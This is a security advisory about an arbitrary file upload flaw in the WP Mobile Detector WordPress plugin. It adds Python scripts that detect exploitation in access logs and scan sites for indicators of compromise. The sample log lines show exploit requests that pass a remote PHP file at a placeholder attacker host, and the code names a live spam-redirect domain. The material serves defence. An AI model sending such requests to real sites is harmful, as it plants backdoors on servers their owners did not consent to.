WP Mobile Detector is a WordPress plugin that detects whether a visitor is using a standard mobile phone or a smartphone and loads a compatible WordPress mobile theme for each.
For the last few days, Sucuri noticed that an increasing number of websites were being infected without any outdated plugin or known vulnerability present. In most cases it was a porn spam infection. The research team dug into the issue and found that the common denominator across these WordPress sites was the WP Mobile Detector plugin, which had a 0-day arbitrary file upload vulnerability disclosed on May 31st by the Plugin Vulnerabilities team. The plugin has since been removed from the WordPress repository and no patch is available.
The vulnerability is very easy to exploit: all the attacker needs to do is send a request to resize.php or timthumb.php (yes, timthumb; in this case it simply includes resize.php) inside the plugin directory, passing the backdoor URL. The vulnerability was publicly disclosed on May 31st, but according to our firewall logs the attacks have been going on since May 27th.
It is a simple vulnerability that stems from failing to validate and sanitize input from untrusted sources. No security checks are performed, so an attacker can feed the src parameter a malicious URL pointing at a file that contains PHP code, which the plugin fetches and writes into its cache subdirectory.
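For defenders who want to check their own access logs for the request shape described above, here is an added example (not code from the original article or from Sucuri). It parses Apache combined-format log lines and flags two indicators: a request to resize.php or timthumb.php under the plugin directory whose src parameter is a remote URL, and a direct request for a PHP file inside the plugin's cache subdirectory. The log lines, IP addresses, timestamps and the attacker.example host name are constructed for the demonstration.

```python
"""Detect WP Mobile Detector exploitation attempts in Apache access logs.

Added example, not part of the original article. Flags (1) resize.php or
timthumb.php requests under the plugin directory whose ``src`` parameter is a
remote URL and (2) direct requests for PHP files inside the plugin's cache
subdirectory. All sample log lines below are constructed.
"""
import re
from urllib.parse import urlparse, parse_qs

# Apache "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

PLUGIN_DIR = "/wp-content/plugins/wp-mobile-detector/"
ENTRY_POINTS = ("resize.php", "timthumb.php")
REMOTE_SCHEMES = ("http", "https", "ftp")


def classify_request(target):
    """Return a reason string if the request target matches an indicator, else None."""
    parsed = urlparse(target)          # target has no scheme, so this splits path/query only
    path = parsed.path
    if PLUGIN_DIR + "cache/" in path and path.lower().endswith((".php", ".phtml")):
        return "PHP file requested from plugin cache directory"
    if PLUGIN_DIR in path and path.endswith(ENTRY_POINTS):
        for src in parse_qs(parsed.query).get("src", []):
            src_url = urlparse(src)
            if src_url.scheme in REMOTE_SCHEMES and src_url.netloc:
                return "remote src URL passed to %s: %s" % (path.rsplit("/", 1)[-1], src)
    return None


def find_exploit_attempts(lines):
    """Scan an iterable of Apache combined log lines; return a list of finding dicts."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                    # malformed or non-combined line; skip
        reason = classify_request(m.group("target"))
        if reason:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "target": m.group("target"),
                "status": int(m.group("status")),
                "reason": reason,
            })
    return findings


# Constructed sample log lines (not real traffic); attacker.example is a placeholder host.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/May/2016:10:01:02 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://attacker.example/shell.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [27/May/2016:10:01:05 +0000] "GET /wp-content/plugins/wp-mobile-detector/cache/shell.php HTTP/1.1" 200 32 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/May/2016:10:02:00 +0000] "GET /wp-content/plugins/wp-mobile-detector/timthumb.php?src=https://attacker.example/x.php HTTP/1.1" 200 512 "-" "curl/7.47.0"',
    '192.0.2.9 - - [27/May/2016:10:03:00 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=/wp-content/uploads/logo.png&w=100 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [27/May/2016:10:04:00 +0000] "GET /index.php HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in find_exploit_attempts(SAMPLE_LOG):
        print("%(time)s %(ip)s %(status)s %(reason)s" % f)
```

Only a src value with a scheme and host is flagged, so ordinary plugin usage with a local image path (the fourth sample line) is not reported. A status of 200 on the cache hit is the stronger signal, because it means the dropped file was served.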
It is highly recommended that everyone remove this plugin for now. If you really need it, a partial temporary fix is to disable PHP execution in the wp-mobile-detector/cache subdirectory, for example with this code in a .htaccess file in that directory:
<Files *.php>
deny from all
</Files>
Please note that this fix only prevents the uploaded malware from executing on your server. Attackers will still be able to upload files to the cache subdirectory and link to them in attacks on third-party sites (iframes, scripts, malicious downloads) or simply host spammy or illegal content there. You can also revoke write permissions on the cache subdirectory altogether, but that may break the plugin's functionality.
The team at Sucuri has been testing this exploit against the most popular WordPress security plugins that offer application-level firewalls and other preventive measures, and it successfully evaded all of them. Sites behind the Sucuri Firewall have been patched, since its release, via the system's virtual hardening engine that sits at the edge.
At this moment the majority of the vulnerable sites are infected with porn spam doorways. You can usually find a gopni3g directory in the site root containing story.php (the doorway generator script), an .htaccess file, and subdirectories with spammy files and templates. The doorways redirect visitors to hxxp://bipaoeity[.]in/for/77?d=.
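To turn the indicators above into a quick post-compromise check, here is an added example (not code from the original article or from Sucuri). It walks a WordPress site root and reports a gopni3g directory and its story.php, PHP files dropped into the plugin's cache subdirectory, and script, HTML or .htaccess files that reference the redirect domain. The sample site tree that build_sample_site() creates is constructed for the demonstration; run the script against a real site root instead of the temporary tree to use it.

```python
"""Post-compromise indicator check for the WP Mobile Detector campaign.

Added example, not part of the original article. Scans a site root for the
indicators the article names. The sample tree built by build_sample_site()
is constructed for the demonstration.
"""
import os
import tempfile

DOORWAY_DIR = "gopni3g"
DOORWAY_SCRIPT = "story.php"
CACHE_DIR = os.path.join("wp-content", "plugins", "wp-mobile-detector", "cache")
REDIRECT_DOMAIN = b"bipaoeity.in"     # written as bipaoeity[.]in (defanged) in the article
MAX_SCAN_BYTES = 512 * 1024           # only read the head of large files


def _under(dirpath, parent):
    """True if dirpath is parent or a subdirectory of parent (no 'cache2' false positives)."""
    return dirpath == parent or dirpath.startswith(parent + os.sep)


def scan_site_root(root):
    """Return a sorted list of (indicator, relative_path) tuples found under root."""
    findings = []
    cache_path = os.path.join(root, CACHE_DIR)
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        in_doorway = os.path.basename(dirpath) == DOORWAY_DIR
        if in_doorway:
            findings.append(("doorway directory", rel_dir))
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if in_doorway and name == DOORWAY_SCRIPT:
                findings.append(("doorway generator script", rel))
            if _under(dirpath, cache_path) and name.lower().endswith((".php", ".phtml")):
                findings.append(("PHP file in plugin cache", rel))
            # Look for the redirect domain in files that can carry a redirect.
            if name.endswith((".php", ".html", ".js")) or name == ".htaccess":
                try:
                    with open(full, "rb") as fh:
                        if REDIRECT_DOMAIN in fh.read(MAX_SCAN_BYTES):
                            findings.append(("redirect domain reference", rel))
                except OSError:
                    pass                # unreadable file; keep scanning
    return sorted(findings)


def build_sample_site(root):
    """Create a constructed site tree mixing clean files with the campaign's indicators."""
    def write(rel, data):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)

    write("index.php", b"<?php require 'wp-blog-header.php';")
    write(os.path.join("wp-content", "uploads", "logo.png"), b"\x89PNG")
    write(os.path.join(CACHE_DIR, "abc123.jpg"), b"\xff\xd8")           # legitimate resized image
    write(os.path.join(CACHE_DIR, "x.php"), b"<?php /* dropped file */")  # what the exploit leaves behind
    write(os.path.join(DOORWAY_DIR, DOORWAY_SCRIPT), b"<?php /* doorway generator */")
    write(os.path.join(DOORWAY_DIR, ".htaccess"), b"RewriteEngine On\n")
    write(os.path.join(DOORWAY_DIR, "templates", "t1.html"),
          b'<meta http-equiv="refresh" content="0;url=http://bipaoeity.in/for/77?d=">')
    return root


def demo_scan():
    """Build the constructed tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        return scan_site_root(tmp)


if __name__ == "__main__":
    for indicator, path in demo_scan():
        print("%-28s %s" % (indicator, path))
```

A clean site yields an empty list. Absence of these indicators is not proof the site is clean, since the same upload path can drop any file name, so pair the check with the access-log review and with removing the plugin.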